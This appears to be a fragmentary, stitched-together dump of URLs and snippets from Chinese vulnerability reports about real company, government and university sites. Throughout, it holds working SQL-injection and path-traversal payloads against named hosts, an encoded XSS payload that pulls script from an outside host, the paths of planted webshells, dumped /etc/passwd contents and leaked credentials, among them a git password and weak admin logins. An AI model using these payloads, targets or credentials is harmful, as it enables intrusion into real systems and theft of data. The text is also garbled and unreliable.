rmi://127.0.0.1:9988/bankCardService rmi://127.0.0.1:9988/ipAddressLocationService rmi://127.0.0.1:9988/loanCommentService rmi://127.0.0.1:9988/loanManageService rmi://127.0.0.1:9988/thirdPartyService rmi://127.0.0.1:9988/innerMailService rmi://127.0.0.1:9988/userNoticeService rmi://127.0.0.1:9988/investorService rmi://127.0.0.1:9988/cashWithdrawService rmi://127.0.0.1:9988/blackListService rmi://127.0.0.1:9988/borrowerService rmi://127.0.0.1:9988/notificationConfigService rmi://127.0.0.1:9988/userSecurityQuestionService rmi://127.0.0.1:9988/creditReportService rmi://127.0.0.1:9988/creditMaterialService rmi://127.0.0.1:9988/creditRightsService rmi://127.0.0.1:9988/loanQuartzService rmi://127.0.0.1:9988/collectionService rmi://127.0.0.1:9988/rechargeLogService rmi://127.0.0.1:9988/loanCollateralService rmi://127.0.0.1:9988/noblemetalService rmi://127.0.0.1:9988/noblemetalRecordService rmi://127.0.0.1:9988/soldBackService rmi://127.0.0.1:9988/extractionService rmi://127.0.0.1:9988/noblemetalInfoService rmi://127.0.0.1:9988/nobleCustodyService rmi://127.0.0.1:9988/SigningNoblemetalService rmi://127.0.0.1:9988/channelService rmi://127.0.0.1:9988/goldCardService rmi://127.0.0.1:9988/buyGoldService rmi://127.0.0.1:9988/tradeFlowService rmi://127.0.0.1:9988/returnGoldService rmi://127.0.0.1:9988/custodyService http://192.168.1.120:8080/jforum http://58.68.224.22:8080/public/fromUrl.session.action http://58.68.224.22:8080/public/backUrl.action http://58.68.224.22:8080/public/usercenterControl.session.action http://58.68.224.22:8080/public/usercenterControl.session.action http://**.**.**.**/oa/login.do?action=login http://**.**.**.**/oa/app_resource/form/image/Img486105403.jsp http://210.21.236.163/Users/LoginPage.html http://kr.haidilao.com http://kr.haidilao.com/index.php/Dishes/feature/id/101 http://track.3songshu.com/app.zip http://**.**.**.**/asp/xinsheng/xyxsheng.asp http://**.**.**.**/login.jsp http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/about_us.php?Key=7 http://**.**.**.**/article.php?id=818717 http://**.**.**.**:20000/hebwspt/ http://bbs.haidilao.com/portal.php?mod=list&catid=1 user:admin pass:123456 http://bbs.haidilao.com/data/dzapp_haodai_config.php http://www.cninsure.net http://www.cninsure.net/help.aspx Url:http://121.201.34.104/admin/login.php http://jw.sthu.edu.cn/上海师范大学天华学院 http://**.**.**.**/loginm.shtml?option=getMsgBack&subOption=m&getMsgBack=1&identifyCode=1 https://**.**.**.**/loginm.shtml?option=getMsgBack&subOption=m&getMsgBack=1&identifyCode http://**.**.**.**/policy.shtml?option=getCity&province= url:http://www.zhen.com/ http://**.**.**.**/ user:zhangling pwd:000000 http://www.ccib.com.cn/CHN/About/newsShow.asp?news_id=428 http://zhaopin.baidu.com/?query=%3C/script%3E%3Cscript%3Ealert%28%22%22%29%3C/script%3E%27 http://www.topxia.com http://www.topxia.com/.git/config http://**.**.**.**/productsDia.php?d=1 http://**.**.**.**/productsDia.php?d=1 http://**.**.**.**/bugs/wooyun-2015-0140285 http://learning.ufh.com.cn/CVS/Root http://learning.ufh.com.cn/CVS/Entries http://em.ele.me/ test:test弱口令进去之后 www.oxiranchem.com/gufen/jishu.php?form_id=226&bigkind=04&kind=0403 http://**.**.**.**/account/Installshow.aspx?id=68 http://**.**.**.**/account/Installshow.aspx?id=12177266 http://**.**.**.**/account/Installshow.aspx?id=14087416 http://**.**.**.**/account/maintenanceshow.aspx?id=1203 http://**.**.**.**/account/maintenanceshow.aspx?id=5562451 http://**.**.**.**/account/maintenanceshow.aspx?id=7163769 http://www.oilpl.com:81/card_link/index.action http://bm.huatu.com/plus/ http://**.**.**.**:7776/mes/viewCustomer.action?id=26571012 http://**.**.**.**:7776/mes/viewCustomer.action?id=26571013 http://srm.fiberhome.com.cn/srm/Login.aspx http://srm.fiberhome.com.cn/srm/upload.aspx http://srm.fiberhome.com.cn/srm/upload/20151220/201512200501496718.asp http://118.144.75.72/invoker/JMXInvokerServlet http://118.144.75.72/is/index.jsp http://www.ifeng.com/ http://www.qhxjcy.gov.cn/admin/ http://www.qhxjcy.gov.cn/index.asp http://**.**.**/admin/_ http://**.**.**/admin/_ http://**.**.**/admin/_ http://**.**.**/admin/_ http://**.**.**/admin/_ http://**.**.**/admin/_ http://**.**.**/admin/_ http://**.**.**/admin/_ http://**.**.**/admin/_ http://**.**.**/admin/_ http://**.**.**/admin/_ http://**.**.**/admin/_ http://**.**.**/admin/_ http://**.**.**/admin/_ http://**.**.**/admin/_ http://**.**.**/admin/_ http://oa.baison.com.cn http://oa.baison.com.cn//web/careerapply/HrmCareerApplyPerView.jsp?id=1 http://oa.baison.com.cn//web/careerapply/HrmCareerApplyPerView.jsp?id=1%20union%20select%201,2,loginid,password,lastname,6,7%20from%20HrmResourcemanager http://123.57.10.156 http://**.**.**.**:80/ http://**.**.**.**:7001/defaultroot/login.jsp http://218.26.176.181:8082/yyoa/checkWaitdo.jsp?userID=1 http://hiface.haidilao.com:9990/hdlSNS/hdlsns/newPhoto.action?userId=12939124 http://oa.gykgnmg.com/yyoa/common/js/menu/test.jsp?doType=101&S1=select%20@@basedir http://oa.gykgnmg.com/yyoa/common/js/menu/test.jsp?doType=101&S1=select%20database%28%29 http://**.**.**.**:7776/mes/viewCustomer.action?id=26571013 http://**.**.**.**:7776/mes/1.jsp?i=ls encap:Ethernet fe9a:4d/64 Scope:Link MTU:1500 packets:863515695 packets:135263890 txqueuelen:1000 http://agent.cctvmall.cn/mall/login.html http://**.**.**.**/website/home.do idolbm.dragontv.cn/select.php?uuid=001901 http://**.**.**.**/ http://**.**.**.**/manager/news/more/more_1.asp?disp_id=322 http://**.**.**.**/manager/news/more/more_1.asp?disp_id=322 http://**.**.**.**/manager/news/more/more_1.asp?disp_id=322 http://**.**.**.**//jjproduct/jjProductSercher.htm?orderstr=update_date%20desc http://**.**.**.**//oa/admin/application/file_download.jsp?filePath=c:\windows\system.ini http://**.**.**.**/wlsh/glink/show.php?ID=5 http://**.**.**.**/spc/ http://202.85.212.104/SDMS/login!login.do https://leishen:Haier0806@git.coding.net/leishen/web.git leishen:Haier0806 http://store.leishen.cn/ http://**.**.**.** http://**.**.**.**/index.php?city_id=304 http://**.**.**.**/knowledge/indexs.aspx"--data="id=55 http://sinopectech.com http://sinopectech.com/s.rar http://**.**.**.**/ http://m.v.qq.com/search.html?searchSession=&act=0&keyWord=aa\74\151\155\147\40\163\162\143\75\170\40\157\156\145\162\162\157\162\75\163\75\143\162\145\141\164\145\105\154\145\155\145\156\164\50\47\163\143\162\151\160\164\47\51\73\142\157\144\171\56\141\160\160\145\156\144\103\150\151\154\144\50\163\51\73\163\56\163\162\143\75\47\150\164\164\160\72\57\57\144\167\172\56\143\156\57\62\157\150\130\106\60\47\73\76 http://218.26.176.181/(国药山西的主站)的9090端口是jboss,检测发现存在最新的java反序列化漏洞。 http://218.26.176.181:9090/ http://mindiao.cjn.cn/guest_more.php?boardid=81 http://mindiao.cjn.cn/guest_more.php?boardid=81 http://**.**.**.**/backoffice/main1.aspx?type=fore http://**.**.**.** root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin apache:x:48:48:Apache:/var/www:/sbin/nologin nscd:x:28:28:NSCD Daemon:/:/sbin/nologin distcache:x:94:94:Distcache:/:/sbin/nologin vcsa:x:69:69:virtual owner:/dev:/sbin/nologin rpc:x:32:32:Portmapper user:/:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin oprofile:x:16:16:Special OProfile:/home/oprofile:/sbin/nologin webalizer:x:67:67:Webalizer:/var/www/usage:/sbin/nologin dovecot:x:97:97:dovecot:/usr/libexec/dovecot:/sbin/nologin squid:x:23:23::/var/spool/squid:/sbin/nologin pcap:x:77:77::/var/arpwatch:/sbin/nologin mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin ntp:x:38:38::/etc/ntp:/sbin/nologin mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash postgres:x:26:26:PostgreSQL Server:/var/lib/pgsql:/bin/bash dbus:x:81:81:System bus:/:/sbin/nologin avahi:x:70:70:Avahi daemon:/:/sbin/nologin named:x:25:25:Named:/var/named:/sbin/nologin xfs:x:43:43:X Server:/etc/X11/fs:/sbin/nologin rpcuser:x:29:29:RPC User:/var/lib/nfs:/sbin/nologin nfsnobody:x:4294967294:4294967294:Anonymous User:/var/lib/nfs:/sbin/nologin haldaemon:x:68:68:HAL daemon:/:/sbin/nologin avahi-autoipd:x:100:103:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin sabayon:x:86:86:Sabayon user:/home/sabayon:/sbin/nologin gdm:x:42:42::/var/gdm:/sbin/nologin weblogic:x:700:700::/app:/bin/bash patrol:x:501:501::/app/patrol:/bin/bash http://210.77.177.13:8000/sgcis/ encap:Ethernet A9:4F:BF addr:10.2.150.134 Bcast:10.2.150.191 Mask:255.255.255.192 MTU:1500 packets:4048849086 packets:3822598125 txqueuelen:1000 http://115.182.9.109/console http://115.182.9.109/ca/ma3.jsp http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd http://www.w3.org/1999/xhtml http://xxx/downurl.phpurls=datauploadfile/1/1450631688.php&filename=hhh.php http://xxx/data/uploadfile/1/1450631688.php http://demo.phpoa.cn/data/uploadfile/2/1450632097.php http://**.**.**.**/ http://**.**.**.**/ http://news.sicnu.edu.cn/?ctl=login http://weixin.glodon.com/.svn/entries http://minsheng.cn/logon/admin_logon.jsp http://220.181.168.69:7001/ http://www.qljr.com/commentlist?page=1&newid=611813 http://special.xincheping.com/w-/OjhSztmN*.html http://**.**.**.**/joomla/ http://**.**.**.**/joomla/wuyun.php http://**.**.**.**/ http://learning.ufh.com.cn/CVS/Entries http://learning.ufh.com.cn/adm/CVS/Entries http://**.**.**.**/video.php?nid=1 http://**.**.**.**:8080/yyoa/docMgr/superviseAndUrge/loadUrgeInfo.jsp?docIds=1 http://**.**.**.**:8080/yyoa/docMgr/superviseAndUrge/loadUrgeInfo.jsp?docIds=1 http://**.**.**.**:7001/wscx/ http://**.**.**.**/**.**.**.**.rar http://m.100tal.com/Home/Index/wlzxwz_note?star_article_id=1 http://**.**.**.**/ https://**.**.**.**/community/infosec/blog/2015/12/20/cve-2015-7755-juniper-screenos-authentication-backdoor http://www.cjkd.com.cn http://www.cjkd.com.cn/admin/login http://**.**.**.**/Info.asp?ArticleID=2950 http://**.**.**.**/webpac/search.cfm http://**.**.**.**/代码执行,可getshell http://oa.mis.hexun.com/feedback/fb/viewFbResult.action?id=40480 http://202.121.32.191/TeachingCenter/login.html http://211.147.252.237:8080/flxt/ http://211.147.252.237:8080/mdass/ http://211.147.252.237:8080/racs/ http://211.147.252.237:8080/jbossws13/ http://211.147.91.45/SignOnServlet http://**.**.**.**/admin/default.php http://**.**.**.**/ http://**.**.**.**/control/ajax/getcity.aspx?pid=1 http://wechat.bestv.com.cn/search/ http://**.**.**.**/ http://oa.feihe.com/seeyon/index.jsp http://drops.wooyun.org/papers/598 http://www.leishen.cn/.git/config https://git.coding.net/leishen/web.git http://www.leishen.cn/phpinfo.php http://m.leishen.cn/show.php?id=32&cid=18 http://m.leishen.cn/listshow.php?id=22&cid=6 http://**.**.**.**/ http://218.17.215.54:8080/StorageModel/login.jsp http://218.97.254.84:8080/UUMC/ ACC--http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/gsjj.htm http://**.**.**.**/ http://**.**.**.**/gsjj.php http://**.**.**.**/ http://**.**.**.**/qyjj.php http://**.**.**.**/gsjj.php http://**.**.**.**/main/xwzx.aspx?nid=168 http://**.**.**.**/index.php http://**.**.**.**/index.php http://www.mafengwo.cn/together/ http://www.hahapinche.com/News/news_detail?id=660 http://**.**.**.**/?id=/* http://**.**.**.**/bugs/wooyun-2015-0163141 http://**.**.**.**/?id=/* http://haosy.glodon.com:80/ http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/content/24531 http://**.**.**.**/bugs/wooyun-2015-0163155/trace/790d482c016ae9fa3f23903dc67be586 http://**.**.**.**/phpmyadmin2/ http://birdpush.com/admin/login.action http://www.haoshouwang.com/phone?brand=21 index.php/search/*/1.html www.qhwealth.com http://www.qhwealth.com http://**.**.**.**:80/fund/FundPerformance/fundGetChart.do https://**.**.**.**/Sogeiliable/qd- http://**.**.**.**/seeyon/index.jsp http://**.**.**.**/gzStat1/chaxunAction.do?method=queryZb http://**.**.**.**/gzStat1/chaxunAction.do?method=queryZb cn:7001存在weblogic。而且该版本还存在java反序列化命令执行漏洞 http://**.**.**.**/Search.aspx?search=11 http://**.**.**.**/index.jsp http://**.**.**.**//Chart/GoldChart.aspx?ChartDirectorChartImage=chart_fxChart&cacheId=c:\windows\win.ini&cacheDefeat=635863155579382345 http://**.**.**.**/phpmyadmin/ http://**.**.**.**/gouwulist.aspx?Id=16&IsTel=1&httpUrl= http://**.**.**.**/alipayto.aspx?trade_no=2015061544046&SPID= http://**.**.**.**/gouwulist.aspx?Id=16&IsTel=1&httpUrl= http://**.**.**.**/index.jsp http://cms.php.administrator.cctvmall.com/ http://**.**.**.**/index.jsp http://123.124.19.86 http://**.**.**.**/index.jsp usernmae:xxxx@163.com password:string+number http://www.safedog.cn/?id=%20--%20%27%20union%20select%201,2%20from%20users%23 http://humancapital.cufe.edu.cn/admin.php Settings.asmx/AnswerTo http://101.231.75.117/defaultroot/login.jsp http://www.haoshouwang.com/login/forget_password http://www.cninsure.net/touzizhe/shop/member!queryfujian.action?id=264004 http://**.**.**.**:6080/ http://www.yichemall.com www.yichemall.com http://oa.bjgold.com.cn/ http://113.78.134.110:81/login.do http://ylx.mis.hexun.com:81/feedback/fb/viewFbResult.action?id=40480 http://**.**.**.**/ccbs/ccbs/order/showOrderList.do?method=showOrderDetailJsp&orderId=282728&random=2 http://**.**.**.**/ccbs/ccbs/order/pji_orderinfo.jsp?orderId=282728 http://**.**.**.**/ccbs/ccbs/order/showOrder.do?method=showOrderEditCustomerJsp_newOrder&partyId=286987&callPhone=123&edit=false&uniqueid=713.7934794644451&dataSourceId=99&isTest=N http://**.**.**.**/ccbs/ccbs/order/showOrder.do?method=showOrderEditMainJsp&callPhone=123&agentId=2&ccbsUserName=AGENT1&uniqueid=713.7934794644451&dataSourceId=99&temp=Y# http://**.**.**.**/ccbs/ccbs/customer/showCustomer.do?method=queryCustomerAddressEditJsp&partyId=286987&contactMechId=465324&productStoreName=%E5%8C%97%E4%BA%AC%E9%87%91%E8%9E%8D%E8%A1%97%E5%BA%97&productStoreId=100009&random=1450698218897 http://**.**.**.**/ccbs/ccbs/store/showProductStore.do?method=showUserAddressCheckJsp&serviceAddress=&startCode=&endCode=&cityId=50003 http://www.gykgah.com/yyoa/ http://www.gykgah.com/yyoa/checkWaitdo.jsp?userID=1 http://**.**.**.**/file_title.php?weblan=g&in_title_id=123 http://**.**.**.**/file_title.php?weblan=g&in_title_id=123 http://**.**.**.**/invite/bulletin/list.aspx http://**.**.**.**:80/ http://www.chinanetwork.com.cn/w8/Comment/GetUserCommits?pid=-1 http://zhishangjianzhu.blog.sohu.com/a/app/discuss/save.htm?_input_encode=UTF-8 http://**.**.**.**/ http://**.**.**.**/index.php?m=2&s=16 http://**.**.**.** http://**.**.**.**/page/maint/common/UserResourceUpload.jsp?dir=/ height:20px;BORDER http://ticketapi.video.qq.com/get_bonus?otype=json&callback=jQuery19102120662210509181_1450691532464&low_login=1&c_id=1&ucode=asd&c_from=1&g_tk=932252050&_=1450691532477 http://121.201.104.80:8000/webpy/index#ace/daydaykk/editlabel.html http://218.26.176.181:8082/yyoa/common/selectPersonNew/initData.jsp?trueName=1 http://**.**.**.**/jyztbmis_hb/memberLogin.jspx http://www.csairshop.com:80/category.php?brand=78&filter=0&id=683&price_max=0&price_min=0 http://www.csairshop.com:80/category.php?brand=78&filter=0&id=683&price_max=0&price_min=0 http://kr.haidilao.com http://kr.haidilao.com/index.php/About/load http://dk.qk365.com/ http://www.baoxian.com/upload/ http://**.**.**.**/manager/html http://www.4008107107.com/DingCan2List/SearchList?supplierid=169188&searchKey=%E5%95%8A&ram=0.8239255126100034 http://mgtp.suning.com/server-status https://smile.wanda.cn/mobile/index/login http://**.**.**.**:9020/Login.aspx http://**.**.**.**:9020 http://**.**.**.**/news_1.php?id=1741 server:/usr/java/jdk1.6.0_45/jre/lib/amd64:/usr/java/jdk1.6.0_45/jre/../lib/amd64:/usr/java/packages/lib/amd64:/usr/lib64:/lib64:/lib:/usr/lib http://**.**.**.**/ http://115.182.9.109/ http://**.**.**.**/news/article.php?cid=4&id=3764 http://m.ikang.com/index.html#login http://www.gzsz.com.cn:888/yyoa/ext/trafaxserver/ExtnoManage/isNotInTable.jsp?user_ids=%2817%29%20union%20all%20select%20user%28%29%23 http://www.gzsz.com.cn:888/yyoa/ext/trafaxserver/ExtnoManage/setextno.jsp?user_ids=%2817%29%20union%20all%20select%201,2,@@version,user%28%29%23 http://www.gzsz.com.cn:888/yyoa/ext/trafaxserver/SendFax/resend.jsp?fax_ids=%281%29%20and%201=2%20union%20select%20concat%280x23,user%28%29,0x23,@@version%29%20--%20- http://redmine.keruyun.com/ https://124.127.49.209/ https://124.127.49.210/ https://124.127.49.211/ https://124.127.49.212/ https://124.127.49.213/ https://124.127.49.214/ http://starvalley.starv.tv admin:123456可登陆,同时,登陆的post表单可以sql注入 http://crm.iresearch.com.cn/login.aspx http://58.251.18.196/ http://58.251.18.196:9002/console/login/LoginForm.jsp http://58.251.18.196:9002/jmxroot/jmxroot.jsp http://124.65.122.154:8080/krt http://124.65.122.154:8080/jmx-console/ http://211.152.45.200/ http://caipiao.gooooal.com/ http://www.gooooal.com/ http://163.gooooal.com/ http://sns.gf.com.cn/km/rs/roadshow.sp bbs.360che.com/m/viewthread.php?tid=549765&extra=page=2&orderby=dateline http://**.**.**.**/ http://www.datuodui.com http://www.datuodui.com/wa/wa/ma3.jsp http://118.144.75.72/platform/framework/global/login.jsp http://118.144.75.72/platform/framework/global/down.jsp http://118.144.75.72/platform/framework/global/down.jsp?link=/WEB-INF/web.xml http://**.**.**.**/pub/tjwcb/index.html http://ip/cgi-bin/ExportSettings.sh的时候,就可以下载config.dat文件,ExportSettings的文件内容如下: user:admin'or'1'='1 pwd:123456 http://www.cninsure.net/touzizhe/shop/member!queryfujiansize.action?id=1 http://**.**.**.**/cn/index.php?pid=1 http://221.133.244.60/ http://**.**.**.** https://tuan.9fbank.com/ http://io.glodon.com/login/login.do http://**.**.**.**/cas/login http://mail.faw.com.cn/ http://**.**.**.**/wa/wa/ma3.jsp http://**.**.**.**/NewsInfo.asp?id=173 http://**.**.**.**/portal/portal!index.action存在命令执行漏洞 http://**.**.**.**/bak.jsp密码test http://20151112.m.ceshi.xin.com/.svn/ http://**.**.**.**/console http://**.**.**.**/app/app1.jsp http://extplat.minanins.com:9002/console/login/LoginForm.jsp http://extplat.minanins.com:9002/jmxroot/jmxroot.jsp http://www.gf.com.cn/commons/showDocumentFile.jsp?id=105471 http://**.**.**.**/webcore/webcont!Cont.action http://cms.php.administrator.cctvmall.com/index.php?r=user/login http://202.96.11.18 http://**.**.**.**/ https://**.**.**.**/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../opt/zimbra/conf/localconfig.xml%00 https://**.**.**.**/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../etc/passwd%00 url:http://223.203.132.38/ http://**.**.**.**/admin/ http://**.**.**.**/wd2/main.do?author=WT6486 http://**.**.**.**/ http://106.37.195.143/clppay/jsp/login/login.jsp http://106.37.195.143 http://**.**.**.**/login/Login.jsp?logintype=1 http://**.**.**.**/car/help.jsp http://**.**.**.**/newsDetail.action http://**.**.**.**/bak.jsp http://122.226.67.42:8080/ http://app.bbs.360che.com/newviewthreadapp1.php?tid=750198&uid=359052&oauth=c829LDUicmOwJLu3/qxu8QpmwvUl555toKrT6lyXdHwt%204PdFRL3oQf87d4tOXuk8xK9#gone http://**.**.**.**:88/school/login.jsp site:tbbs.glodon.com http://tbbs.glodon.com/forum.php?mod=viewthread&tid=1049 http://tbbs.glodon.com/forum.php?mod=viewthread&tid=1396 http://**.**.**.**/ http://**.**.**.** http://**.**.**.**/site_item_content_2.php?site_map_item_id=310 http://**.**.**.**/SmartKMS/LoginPage.action http://wxy.szu.edu.cn/Info.aspx?pc=about存在比较严重的sql注入漏洞 kali:/tmp# kali:/tmp# http://121.42.192.152:8080/ http://121.42.192.152:8080/web-console http://121.42.192.152:8080/jbossass/jbossass.jsp patrol.zznissan.com.cn/news/news-mb.php?id=168 http://**.**.**.**/index.jsp http://**.**.**.**/,图中标识链接存在命令执行漏洞 http://**.**.**.**/ggkb/lyb/detail.asp?wordid=2 http://**.**.**.**/view.asp?InfoID=8888 http://www.ifuzhuang.com/ http://222.73.113.49/site/login http://202.96.11.73 http://202.96.11.73/names.nsf/$users?OpenView&Start=1&count=200 http://app.360che.com/android.html http://**.**.**.**/logon.jsp http://506srm.cofco.com/FileDownLoad.aspx?fileid=20981 http://506srm.cofco.com/FileDownLoad.aspx?fileid=20980 http://bbs.360che.com/memcp.php?items=shipaddress&action=newprofile&typeid=5&addid=8583&operation=update#addradd http://bbs.360che.com/memcp.php?items=shipaddress&action=newprofile&typeid=5&addid=8583&operation=update#addradd http://bbs.360che.com/memcp.php?items=shipaddress&action=newprofile&typeid=5&addid=8511&operation=update#addradd http://bbs.360che.com/memcp.php?items=shipaddress&action=newprofile&typeid=5&addid=8511&operation=update#addradd http://**.**.**.**//manage/upload/upload.html http://test.fh21.com.cn/index.php?a=countNum&aa=1&c=index&m=zzzc http://**.**.**.**/Web/HotelMain.aspx?content=HotelDetail&id=27922EA0-53EF-40E2-A832-92ACE1F59681 http://**.**.**.**/ntutcsl/news_info.php?id=38 http://**.**.**.**/findpwd.aspx http://**.**.**.**/handlers/findpwdservice.ashx?cmd=ChangePwdForFind http://**.**.**.**/handlers/addressservice.ashx?callback=myFunc&cmd=GetAddressByID&r=0.522482806749804 http://mai.360che.com/flow.php?step=xiu_add http://fair.st.octmami.com/admin.php?r=order/default/index http://60.28.104.133:9060//yyoa/assess/js/initDataAssess.jsp http://60.28.104.133:9060/yyoa/common/selectPersonNew/initData.jsp?trueName=1 http://60.28.104.133:9060//yyoa/ext/trafaxserver/ExtnoManage/setextno.jsp?user_ids= http://60.28.104.133:9060/yyoa/common/selectPersonNew/initData.jsp?trueName=1 http://www.cctvstock.com/ http://club.cctvstock.com/tools/json/LoginPlus.aspx?action=login&callback=jsonp1450765749548&u=admin&p=admin http://**.**.**.**:82/superadmin/adminLogin.action http://**.**.**.**/news.php?sid=1 http://cfms.sdu.edu.cn/.git/config http://**.**.**.**/=**.**.**.**存在命令执行 http://www.dongfeng-nissan.com.cn/zh-CN/dealer/nissan/jiangxi/nanchang/nchcheng/quote.aspx?s=teana http://222.76.217.175/ http://**.**.**.**/login/Login.jsp?logintype=1 http://**.**.**.**/car/test.jsp http://114.141.132.254/level/15/exec/- http://test.ipcc-rise.com/ http://test.ipcc-rise.com/pay/order.php http://tcmages.com:8080/jmx-console/ http://sadmin.haoshouwang.com/youorder/minute/id/645/state/55 view-source:http://sadmin.haoshouwang.com/login/index http://mrtg.yxdown.com/ http://hk5.midea.com http://haiwai.anjuke.com http://haiwai.anjuke.com/list/s?g=6 http://g.fh21.com.cn http://kfcloud.dper.com/index.jsp http://xczx.swufe.edu.cn/ems/exam/sse/ks_card_print_all.jsp?ks_pc_bm= http://hiho.swufe.edu.cn/videos?top=14 http://**.**.**.**/admin index.php/fortune/searchMember https://m.hongkongairlines.com/html/fortune/card_signOut.html http://**.**.**.**/ http://www.scrcoa.com/ http://www.scrcoa.com/yyoa/checkWaitdo.jsp?userID=1 http://www.scrcoa.com/yyoa/common/selectPersonNew/initData.jsp?trueName=1 http://**.**.**.**:8081/m1/login.do http://**.**.**.**/login/Login.jsp?logintype=1 http://**.**.**.**/messager/users.data http://m.lanfw.com/city.php?city_id=bj http://www.cytobacco.com/WEB/admin/website/magazine/manageMagazine.jsp http://**.**.**.**/ttco/notice_list?notice.productState=0 http://**.**.**.**/ttco/netWorthShow?product.id=7E0501916C8C43FF855A114427EB2BFA https://admin.jiashuangkuaizi.com/Public/login/ https://admin.jiashuangkuaizi.com/Public/login/ www.xinnet.com http://www.xinnet.com http://oa.yhfund.com.cn:8070/ http://**.**.**.**:80/Article/FavorableDeatils.aspx?id=96 http://xp.glodon.com/ http://gfm.glodon.com/jmx-console/ http://gfm.glodon.com//invoker/JMXInvokerServlet http://oa.gykgnmg.com/yyoa/HJ/iSignatureHtmlServer.jsp?COMMAND=DELESIGNATURE&DOCUMENTID=1&SIGNATUREID=2 http://oa.gykgnmg.com/yyoa/checkWaitdo.jsp?userID=1 http://27.223.70.77:7001/ http://xmlns.oracle.com/weblogic/domain xmlns:sec="http://xmlns.oracle.com/weblogic/security xmlns:wls="http://xmlns.oracle.com/weblogic/security/wls xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance xsi:schemaLocation="http://xmlns.oracle.com/weblogic/security/xacml http://xmlns.oracle.com/weblogic/security/xacml/1.0/xacml.xsd http://xmlns.oracle.com/weblogic/security/providers/passwordvalidator http://xmlns.oracle.com/weblogic/security/providers/passwordvalidator/1.0/passwordvalidator.xsd http://xmlns.oracle.com/weblogic/domain http://xmlns.oracle.com/weblogic/1.0/domain.xsd http://xmlns.oracle.com/weblogic/security http://xmlns.oracle.com/weblogic/1.0/security.xsd http://xmlns.oracle.com/weblogic/security/wls http://xmlns.oracle.com/weblogic/security/wls/1.0/wls.xsd sec:authentication-provider xsi:type="wls:default-authenticatorType sec:authentication-provider sec:authentication-provider xsi:type="wls:default-identity-asserterType sec:active-type sec:active-type sec:authentication-provider sec:role-mapper xmlns:xac="http://xmlns.oracle.com/weblogic/security/xacml xsi:type="xac:xacml-role-mapperType sec:role-mapper sec:authorizer xmlns:xac="http://xmlns.oracle.com/weblogic/security/xacml xsi:type="xac:xacml-authorizerType sec:authorizer sec:adjudicator xsi:type="wls:default-adjudicatorType sec:adjudicator sec:credential-mapper xsi:type="wls:default-credential-mapperType sec:credential-mapper sec:cert-path-provider xsi:type="wls:web-logic-cert-path-providerType sec:cert-path-provider sec:cert-path-builder sec:cert-path-builder sec:name sec:name sec:password-validator xmlns:pas="http://xmlns.oracle.com/weblogic/security/providers/passwordvalidator xsi:type="pas:system-password-validatorType sec:name sec:name pas:min-password-length pas:min-password-length pas:min-numeric-or-special-characters pas:min-numeric-or-special-characters sec:password-validator http://**.**.**.**//index.aspx?JiGouBianHao=430100 http://218.249.118.229:7001/ http://**.**.**.**:89/login.do https://**.**.**.**/por/login_psw.csp http://**.**.**.**/zfnews.asp?id=2 http://**.**.**.**/zfnews.asp?id=2%20union%20select%201,2,username,4,password%20from%20admin http://**.**.**.**/Database/ http://221.8.57.106:7006/ http://221.8.57.106:7009/ http://221.8.57.106:7006/uddiexplorer/sss.jsp http://221.8.57.106:7006/uddiexplorer/out.jsp http://10.0.7.79 http://10.0.7.69 http://10.0.7.104 http://10.0.7.42 http://10.0.7.39 http://10.0.7.28 http://10.0.7.114 http://10.0.7.76 http://10.0.7.107 http://10.0.7.46 http://10.0.7.45 http://10.0.7.30 http://10.0.7.49 http://10.0.7.37 http://10.0.7.115 http://10.0.7.237 http://10.0.7.236 http://10.0.7.251 http://10.0.7.250 http://10.0.7.212 http://10.0.7.183 http://**.**.**.**/Main.aspx# http://**.**.**.**/webmanage/login.aspx http://**.**.**.**/Login.aspx http://**.**.**.**/webmanage/web_manage.asp http://**.**.**.**/Login.aspx http://oa.sy-yy.com:8989/yyoa/checkWaitdo.jsp?userID=1 http://**.**.**.**/weblogic/domain xmlns:sec="http://**.**.**.**/weblogic/security xmlns:wls="http://**.**.**.**/weblogic/security/wls xmlns:xsi="http://**.**.**.**/2001/XMLSchema-instance xsi:schemaLocation="http://**.**.**.**/weblogic/security/xacml http://**.**.**.**/weblogic/security/xacml/1.0/xacml.xsd http://**.**.**.**/weblogic/security/providers/passwordvalidator http://**.**.**.**/weblogic/security/providers/passwordvalidator/1.0/passwordvalidator.xsd http://**.**.**.**/weblogic/domain http://**.**.**.**/weblogic/1.0/domain.xsd http://**.**.**.**/weblogic/security http://**.**.**.**/weblogic/1.0/security.xsd http://**.**.**.**/weblogic/security/wls http://**.**.**.**/weblogic/security/wls/1.0/wls.xsd sec:authentication-provider xsi:type="wls:default-authenticatorType sec:authentication-provider sec:authentication-provider xsi:type="wls:default-identity-asserterType sec:active-type sec:active-type sec:authentication-provider sec:role-mapper xmlns:xac="http://**.**.**.**/weblogic/security/xacml xsi:type="xac:xacml-role-mapperType sec:role-mapper sec:authorizer 